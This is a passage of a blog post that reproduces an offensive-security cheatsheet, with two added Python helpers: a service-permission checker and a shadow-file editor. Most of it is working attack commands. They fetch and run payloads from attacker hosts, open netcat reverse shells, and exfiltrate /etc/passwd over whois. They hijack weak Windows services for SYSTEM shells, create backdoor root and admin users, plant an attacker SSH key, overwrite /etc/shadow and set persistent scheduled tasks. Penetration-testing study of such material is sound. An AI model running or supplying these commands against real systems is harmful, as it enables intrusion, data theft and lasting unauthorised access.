href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#php-1\"><\/a>PHP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php file_put_contents(\"\/var\/tmp\/shell.php\", file_get_contents(\"http:\/\/10.11.0.245\/shell.php\")); ?&gt;<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#python-1\"><\/a>Python<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">python -c \"from urllib import urlretrieve; urlretrieve('http:\/\/10.11.0.245\/nc.exe', 'C:\\\\Temp\\\\nc.exe')\"<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-powershell\"><\/a>HTTP: Powershell<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>powershell -Command \"&amp; {(New-Object System.Net.WebClient).DownloadFile('http:\/\/$ATTACKER\/nc.exe','nc.exe'); cmd \/c nc.exe $ATTACKER 4444 -e cmd.exe\" }\npowershell -Command \"&amp; {(New-Object System.Net.WebClient).DownloadFile('http:\/\/$ATTACKER\/nc.exe','nc.exe'); Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'\" }\npowershell -Command \"(New-Object System.Net.WebClient).DownloadFile('http:\/\/$ATTACKER\/nc.exe','nc.exe')\"; Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'\"\npowershell (New-Object System.Net.WebClient).DownloadFile('http:\/\/$ATTACKER\/file.exe','file.exe');(New-Object -com Shell.Application).ShellExecute('file.exe');\n<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-vbscript\"><\/a>HTTP: VBScript<\/h4>\n\n\n\n<p>Copy and paste contents of&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/wget-cscript\">wget.vbs<\/a>&nbsp;into a Windows Shell and then:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cscript wget.vbs http:\/\/$ATTACKER\/file.exe localfile.exe\n<\/code><\/pre>\n\n\n\n<h4 
class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-linux\"><\/a>HTTP: Linux<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">wget http:\/\/$ATTACKER\/file\ncurl http:\/\/$ATTACKER\/file -O\nscp ~\/file\/file.bin user@$TARGET:tmp\/backdoor.py<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#netcat\"><\/a>NetCat<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Attacker\nnc -l -p 4444 &lt; \/tool\/file.exe\n\n# Victim\nnc $ATTACKER 4444 &gt; file.exe<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-windows-debugexe-method\"><\/a>HTTP: Windows &#8220;debug.exe&#8221; Method<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># 1. In Linux, convert binary to hex ascii:\nwine \/usr\/share\/windows-binaries\/exe2bat.exe \/root\/tools\/netcat\/nc.exe nc.txt\n# 2. Paste nc.txt into Windows Shell.<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-windows-bitsadmin\"><\/a>HTTP: Windows BitsAdmin<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">cmd.exe \/c \"bitsadmin \/transfer myjob \/download \/priority high http:\/\/$ATTACKER\/payload.exe %tmp%\\payload.exe&amp;start %tmp%\\payload.exe<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#whois-data-exfiltration\"><\/a>Whois Data Exfiltration<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># attacker\nnc -l -v -p 43 | sed \"s\/ \/\/g\" | base64 -d\n# victim\nwhois -h $attackerIP -p 43 `cat \/etc\/passwd | base64`<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#bash-ping-sweeper\"><\/a>Bash Ping Sweeper<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">#!\/bin\/bash\nfor lastOctet in {1..254}; do \n    ping -c 1 
10.0.0.$lastOctet | grep \"bytes from\" | cut -d \" \" -f 4 | cut -d \":\" -f 1 &amp;\ndone<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#brute-forcing-xored-string-with-1-byte-key-in-python\"><\/a>Brute-forcing XOR&#8217;ed string with 1 byte key in Python<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">encrypted = \"encrypted-string-here\"\n# try every single-byte key (0..255) and print each candidate plaintext\nfor i in range(256):\n    print(\"\".join([chr(ord(e) ^ i) for e in encrypted]))<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#generating-bad-character-strings\"><\/a>Generating Bad Character Strings<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Python\n''.join([ \"\\\\x{:02x}\".format(i) for i in range(1,256) ])<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\"># Bash\nfor i in {1..255}; do printf \"\\\\\\x%02x\" $i; done; echo -e \"\\r\"<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#converting-python-to-windows-executable-py---exe\"><\/a>Converting Python to Windows Executable (.py -&gt; .exe)<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">python pyinstaller.py --onefile convert-to-exe.py<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#port-scanning-with-netcat\"><\/a>Port Scanning with NetCat<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -nvv -w 1 -z host 1000-2000\nnc -nv -u -z -w 1 host 160-162<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#exploiting-vulnerable-windows-services-weak-service-permissions\"><\/a>Exploiting Vulnerable Windows Services: Weak Service Permissions<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code># Look for SERVICE_ALL_ACCESS in the output\naccesschk.exe \/accepteula -uwcqv \"Authenticated Users\" *\n\nsc config [service_name] 
binpath= \"C:\\nc.exe 10.11.0.245 443 -e C:\\WINDOWS\\System32\\cmd.exe\" obj= \"LocalSystem\" password= \"\"\nsc qc [service_name] (to verify!)\nsc start [service_name]\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-persistence\"><\/a>Creating Persistence<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>sc create spotlessSrv binpath= \"C:\\nc.exe 10.11.0.245 443 -e C:\\WINDOWS\\System32\\cmd.exe\" obj= \"LocalSystem\" password= \"\"\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#port-forwarding--ssh-tunneling\"><\/a>Port Forwarding \/ SSH Tunneling<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ssh-local-port-forwarding\"><\/a>SSH: Local Port Forwarding<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Listen on local port 8080 and forward incoming traffic to REMOTE_HOST:PORT via SSH_SERVER\n# Scenario: access a host that's being blocked by a firewall via SSH_SERVER;\nssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ssh-dynamic-port-forwarding\"><\/a>SSH: Dynamic Port Forwarding<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Listen on local port 8080 as a SOCKS proxy. Traffic sent to 127.0.0.1:8080 is forwarded to its final destination via SSH_SERVER\n# Scenario: proxy your web traffic through SSH tunnel OR access hosts on internal network via a compromised DMZ box;\nssh -D 127.0.0.1:8080 user@SSH_SERVER<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ssh-remote-port-forwarding\"><\/a>SSH: Remote Port Forwarding<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Open port 5555 on SSH_SERVER. 
# Incoming traffic to SSH_SERVER:5555 is tunneled back to LOCAL_HOST:3389 (a host reachable from the client side)\n# Scenario: expose RDP on a non-routable network;\n# By default sshd binds the remote end to 127.0.0.1 on SSH_SERVER; GatewayPorts yes in sshd_config is needed to bind on all interfaces\nssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER\n# Windows equivalent with plink, run on the victim: its 127.0.0.1:80 becomes reachable at ATTACKER:ATTACKER_PORT on the attacker host\nplink -R ATTACKER:ATTACKER_PORT:127.0.0.1:80 -l root -pw pw ATTACKER_IP<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#proxy-tunnel\"><\/a>Proxy Tunnel<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Open a local port 127.0.0.1:5555. Incoming traffic to 5555 is proxied to DESTINATION_HOST:22 through the HTTP proxy PROXY_HOST:3128 (HTTP CONNECT)\n# Scenario: a remote host runs SSH bound only to 127.0.0.1 (or otherwise unreachable directly), but an HTTP proxy that can reach it is exposed on PROXY_HOST:3128;\nproxytunnel -p PROXY_HOST:3128 -d DESTINATION_HOST:22 -a 5555\nssh user@127.0.0.1 -p 5555<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-tunnel-ssh-over-http\"><\/a>HTTP Tunnel: SSH Over HTTP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Server - open port 80. Redirect all incoming traffic to localhost:80 to localhost:22\nhts -F localhost:22 80\n\n# Client - open port 8080. 
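<\/pre>

<p>Added example for the Weak Service Permissions section above; it is not part of the original cheatsheet. accesschk reads the service DACL for you on the box; this is the same check done offline on the SDDL string that sc sdshow SERVICE_NAME prints, so it can be run over descriptors collected from many hosts. The two descriptors in the block are constructed for the example (the first is the usual Windows default); the SID aliases and right codes are the standard SDDL ones.<\/p>

<pre class=\"wp-block-code\"><code>
```python
# Added example (not from the original cheatsheet): check a service DACL,
# as printed by sc sdshow SERVICE_NAME, for the weak permissions that
# accesschk -uwcqv reports. Sample descriptors below are constructed.

# Service-specific access rights and their two-letter SDDL codes.
SERVICE_RIGHTS = {
    'CC': 'SERVICE_QUERY_CONFIG',
    'DC': 'SERVICE_CHANGE_CONFIG',
    'LC': 'SERVICE_QUERY_STATUS',
    'SW': 'SERVICE_ENUMERATE_DEPENDENTS',
    'RP': 'SERVICE_START',
    'WP': 'SERVICE_STOP',
    'DT': 'SERVICE_PAUSE_CONTINUE',
    'LO': 'SERVICE_INTERROGATE',
    'CR': 'SERVICE_USER_DEFINED_CONTROL',
    'RC': 'READ_CONTROL',
    'SD': 'DELETE',
    'WD': 'WRITE_DAC',
    'WO': 'WRITE_OWNER',
    'GA': 'GENERIC_ALL',
}

# Rights that let the holder take over the service: rewrite its binary path
# (SERVICE_CHANGE_CONFIG), rewrite its DACL, take ownership, or everything.
DANGEROUS = {'DC', 'WD', 'WO', 'GA'}

# Well-known SID aliases for principals that any local user falls under.
# Note 'WD' is WRITE_DAC as a right but Everyone as a SID; the two never mix
# because they sit in different ACE fields.
LOW_PRIV_SIDS = {'AU': 'Authenticated Users', 'WD': 'Everyone',
                 'BU': 'Users', 'IU': 'Interactive'}


def parse_dacl(sddl: str) -> list:
    # Parse the D: part of an SDDL string into ACE dicts with 'type',
    # 'rights' (set of two-letter codes) and 'sid'. The SACL (S:) is ignored.
    if 'D:' not in sddl:
        return []
    dacl = sddl.split('D:', 1)[1].split('S:', 1)[0]
    aces = []
    for raw in dacl.split('(')[1:]:
        fields = raw.rstrip(')').split(';')
        if len(fields) != 6:
            raise ValueError('malformed ACE: ' + raw)
        ace_type, _flags, rights, _obj, _inherit, sid = fields
        if rights.startswith('0x'):
            raise ValueError('hex access mask not handled: ' + rights)
        codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        aces.append({'type': ace_type, 'rights': codes, 'sid': sid})
    return aces


def weak_service_aces(sddl: str) -> list:
    # (principal, [dangerous rights]) for every allow ACE that grants a
    # low-privileged principal a right from DANGEROUS; deny ACEs are skipped.
    findings = []
    for ace in parse_dacl(sddl):
        if ace['type'] != 'A' or ace['sid'] not in LOW_PRIV_SIDS:
            continue
        bad = sorted(SERVICE_RIGHTS[c] for c in ace['rights'].intersection(DANGEROUS))
        if bad:
            findings.append((LOW_PRIV_SIDS[ace['sid']], bad))
    return findings


# Constructed samples. DEFAULT_DACL is the usual Windows default: SYSTEM and
# Administrators control the service, interactive and service users may only
# query it.
DEFAULT_DACL = ('D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)'
                '(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)')
# WEAK_DACL additionally grants Authenticated Users SERVICE_CHANGE_CONFIG,
# which is all that sc config SERVICE_NAME binpath= ... needs.
WEAK_DACL = DEFAULT_DACL + '(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)'

if __name__ == '__main__':
    for name, sddl in (('default', DEFAULT_DACL), ('weak', WEAK_DACL)):
        print(name, weak_service_aces(sddl) or 'no weak ACEs')
```
<\/code><\/pre>

<p>Only the short two-letter form of the access mask is handled; sc sdshow can also print a raw hex mask, which the parser rejects rather than misreading. Deny ACEs are skipped because a deny for the same principal would cancel the finding, and evaluating ACE order properly is out of scope for a quick triage script.<\/p>

<pre class=\"wp-block-preformatted\"># Client - open port 8080.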
# Redirect all incoming traffic to localhost:8080 to 192.168.1.15:80\nhtc -F 8080 192.168.1.15:80\n\n# Client - connect to localhost:8080 -&gt; get tunneled to 192.168.1.15:80 -&gt; get redirected to 192.168.1.15:22\nssh localhost -p 8080<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#runas--start-process-as\"><\/a>RunAs \/ Start Process As<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#powershell\"><\/a>PowerShell<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Requires PSRemoting (WinRM) enabled on COMPUTER_NAME\n$username = 'Administrator';$password = '1234test';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName COMPUTER_NAME -Command { whoami }\n\n# without PSRemoting (opens a new cmd.exe as the given user)\ncmd&gt; powershell Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential 'username', (ConvertTo-SecureString 'password' -AsPlainText -Force))\n\n# without PSRemoting, with arguments\ncmd&gt; powershell -command \"start-process cmd.exe -argumentlist '\/c calc' -Credential (New-Object System.Management.Automation.PSCredential 'username',(ConvertTo-SecureString 'password' -AsPlainText -Force))\"<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cmd\"><\/a>CMD<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Requires an interactive console: runas prompts for the password and has no switch to supply it on the command line\nrunas \/user:userName cmd.exe<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#psexec\"><\/a>PsExec<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Without \\\\COMPUTER psexec runs the command locally under the given credentials; add \\\\COMPUTER to run it on a remote host (needs admin rights there and SMB reachable)\npsexec -accepteula -u user -p password cmd \/c c:\\temp\\nc.exe 10.11.0.245 80 -e cmd.exe<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a 
href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#pth-winexe\"><\/a>Pth-WinExe<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># -U also accepts an NTLM hash in place of the password (user%LMHASH:NTHASH) for pass-the-hash\npth-winexe -U user%pass --runas=user%pass \/\/10.1.1.1 cmd.exe<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#recursively-find-hidden-files-windows\"><\/a>Recursively Find Hidden Files: Windows<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">dir \/A:H \/s \"c:\\program files\"<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#general-file-search\"><\/a>General File Search<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Query the local db for a quick file find. Run updatedb before executing locate.\nlocate passwd\n\n# Show which file would be executed in the current environment, depending on the $PATH environment variable;\nwhich nc wget curl php perl python netcat tftp telnet ftp\n\n# Search for *.conf (case-insensitive) files recursively starting with \/etc; quote the pattern so the shell does not expand it first\nfind \/etc -iname '*.conf'<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#post-exploitation--maintaining-access\"><\/a>Post-Exploitation &amp; Maintaining Access<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#browsing-registry-hives\"><\/a>Browsing Registry Hives<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># hivexsh (from the hivex package) opens an offline hive file such as SAM or SYSTEM\nhivexsh \/registry\/file<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#decrypting-vnc-password\"><\/a>Decrypting VNC Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">wine vncpwdump.exe -k key<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-user-and-adding-to-local-administrators\"><\/a>Creating User and Adding to Local 
Administrators<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Needs an elevated shell; the new local admin can then be used over RDP, SMB or WinRM\nnet user spotless spotless \/add &amp; net localgroup Administrators spotless \/add<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-ssh-authorized-keys\"><\/a>Creating SSH Authorized Keys<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Replace the key with your own public key. sshd (StrictModes) ignores the file if \/root\/.ssh or authorized_keys is group- or world-writable (700 \/ 600 are safe)\nmkdir \/root\/.ssh 2&gt;\/dev\/null; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChKCUsFVWj1Nz8SiM01Zw\/BOWcMNs2Zwz3MdT7leLU9\/Un4mZ7vjco0ctsyh2swjphWr5WZG28BN90+tkyj3su23UzrlgEu3SaOjVgxhkx\/Pnbvuua9Qs9gWbWyRxexaC1eDb0pKXHH2Msx+GlyjfDOngq8tR6tkU8u1S4lXKLejaptiz0q6P0CcR6hD42IYkqyuWTNrFdSGLtiPCBDZMZ\/5g1cJsyR59n54IpV0b2muE3F7+NPQmLx57IxoPjYPNUbC6RPh\/Saf7o\/552iOcmVCdLQDR\/9I+jdZIgrOpstqSiJooU9+JImlUtAkFxZ9SHvtRbFt47iH7Sh7LiefP5 root@kali' &gt;&gt; \/root\/.ssh\/authorized_keys<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-backdoor-user-wo-password\"><\/a>Creating Backdoor User w\/o Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># UID 0 user with an empty password field; su spotless works where pam_unix permits empty passwords (nullok)\necho 'spotless::0:0:root:\/root:\/bin\/bash' &gt;&gt; \/etc\/passwd\n\n# Rarely needed: if the user was created with useradd and passwd is not working, write a known SHA-512 crypt hash straight into \/etc\/shadow instead. The sed below replaces the first '!' on every line of \/etc\/shadow (the locked-password marker), so it also unlocks any other locked account; check the result. 
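<\/pre>

<p>Added example for the backdoor-user section above; it is not part of the original cheatsheet. The sed in this section rewrites the first '!' on every line of \/etc\/shadow, so besides the intended account it also unlocks every other locked one. The block below edits exactly one record and reports which records changed, which is the check to run before copying the result back over \/etc\/shadow. The sample shadow file is constructed; KALI_HASH is the SHA-512 crypt hash of the password kali used by the sed on this page.<\/p>

<pre class=\"wp-block-code\"><code>
```python
# Added example (not from the original cheatsheet): set one user's hash in
# /etc/shadow content without touching other accounts. The cheatsheet's sed
# replaces the first '!' on EVERY line, which also unlocks every other locked
# account; the sample shadow file below is constructed to show the difference.

import time

# SHA-512 crypt hash for the password kali, as used in the cheatsheet's sed.
KALI_HASH = ('$6$o1.HFMVM$a3hY6OPT/DiQYy4koI6Z3/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8'
             '/6wJI6uF/Q7mniOdq92v6yjzlVlXlxkT.')

SHADOW_FIELDS = 9   # name:hash:lastchg:min:max:warn:inactive:expire:reserved


def set_shadow_hash(shadow_text: str, user: str, new_hash: str, lastchg_days: int = None) -> str:
    # Return shadow_text with only `user`'s hash (field 2) replaced and its
    # last-change day (field 3) updated. Raises KeyError if the user is absent,
    # so a typo cannot silently leave the file untouched.
    if lastchg_days is None:
        lastchg_days = int(time.time() // 86400)
    out = []
    found = False
    for line in shadow_text.splitlines():
        fields = line.split(':')
        if len(fields) == SHADOW_FIELDS and fields[0] == user:
            fields[1] = new_hash
            fields[2] = str(lastchg_days)
            found = True
        out.append(':'.join(fields))
    if not found:
        raise KeyError(user)
    return '\n'.join(out) + '\n'


def sed_style_replace(shadow_text: str, new_hash: str) -> str:
    # What the cheatsheet's sed 's/!/HASH/' does: first '!' on every line.
    return '\n'.join(line.replace('!', new_hash, 1)
                     for line in shadow_text.splitlines()) + '\n'


def changed_records(before: str, after: str) -> list:
    # Usernames whose record differs between two shadow snapshots; run this
    # before copying the result back over /etc/shadow.
    old = dict(line.split(':', 1) for line in before.splitlines() if ':' in line)
    new = dict(line.split(':', 1) for line in after.splitlines() if ':' in line)
    return sorted(u for u in new if old.get(u) != new[u])


# Constructed sample: two locked ('!') accounts, two with no password ('*').
SAMPLE_SHADOW = (
    'root:*:18432:0:99999:7:::\n'
    'daemon:*:18432:0:99999:7:::\n'
    'backup:!:18432:0:99999:7:::\n'
    'spotless:!:18432:0:99999:7:::\n'
)

if __name__ == '__main__':
    safe = set_shadow_hash(SAMPLE_SHADOW, 'spotless', KALI_HASH, 18500)
    print('targeted edit changed:', changed_records(SAMPLE_SHADOW, safe))
    print('sed-style edit changed:',
          changed_records(SAMPLE_SHADOW, sed_style_replace(SAMPLE_SHADOW, KALI_HASH)))
```
<\/code><\/pre>

<p>On a live system read \/etc\/shadow into shadow_text, write the returned string to a temporary file, confirm changed_records lists only the intended user, then copy it over \/etc\/shadow as the cheatsheet does with \/etc\/s2. Updating the last-change day matters because a value of 0 forces a password change at next login on many systems.<\/p>

<pre class=\"wp-block-preformatted\"># Rarely needed: if the user was created with useradd and passwd is not working, write a known hash into \/etc\/shadow with the sed below (it replaces the first '!' on every line).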
# The hash below is SHA-512 crypt for the password \"kali\"\nsed 's\/!\/\\$6$o1\\.HFMVM$a3hY6OPT\\\/DiQYy4koI6Z3\\\/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8\\\/6wJI6uF\\\/Q7mniOdq92v6yjzlVlXlxkT\\.\/' \/etc\/shadow &gt; \/etc\/s2; cat \/etc\/s2 &gt; \/etc\/shadow; rm \/etc\/s2<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-another-root-user\"><\/a>Creating Another root User<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># -o allows a duplicate UID (0 = root); -p takes an already hashed password, which is why it is generated with openssl passwd\nuseradd -u0 -g0 -o -s \/bin\/bash -p `openssl passwd yourpass` rootuser<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#generating-openssl-password\"><\/a>Generating OpenSSL Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># -1 produces an MD5-crypt hash ($1$...); -6 produces SHA-512 crypt ($6$...), the default on current Linux systems\nopenssl passwd -1 password\n# output $1$YKbEkrkZ$7Iy\/M3exliD\/yJfJVeTn5.<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#persistent-back-doors\"><\/a>Persistent Back Doors<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code># Launch evil.exe every 10 minutes as the current user; add \/ru SYSTEM from an elevated prompt to run it as SYSTEM\nschtasks \/create \/sc minute \/mo 10 \/tn \"TaskName\" \/tr C:\\Windows\\system32\\evil.exe\n<\/code><\/pre>\n\n\n\n<p>This was inspired by and forked\/adapted\/updated from&nbsp;<a href=\"https:\/\/github.com\/dostoevskylabs\/dostoevsky-pentest-notes\">Dostoevsky&#8217;s Pentest Notes<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reconnaissance \/ Enumeration Extracting Live IPs from Nmap Scan nmap 10.1.1.1 &#8211;open -oG scan-results; cat scan-results | grep &#8220;\/open&#8221; | cut -d &#8221; &#8221; -f 2 &gt; exposed-services-ips Simple Port Knocking for x in 7000 8000 9000; do nmap -Pn&hellip; <a href=\"https:\/\/whatifsecu.tech\/?p=65\" class=\"more-link\">Continue Reading <span 
class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-65","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/posts\/65","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=65"}],"version-history":[{"count":3,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/posts\/65\/revisions"}],"predecessor-version":[{"id":133,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/posts\/65\/revisions\/133"}],"wp:attachment":[{"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=65"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=65"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=65"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}